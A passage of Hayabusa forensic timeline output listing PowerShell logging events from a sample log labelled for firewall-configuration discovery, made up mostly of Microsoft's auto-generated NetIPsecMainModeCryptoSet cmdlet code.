value=""Remove-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) 
$__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
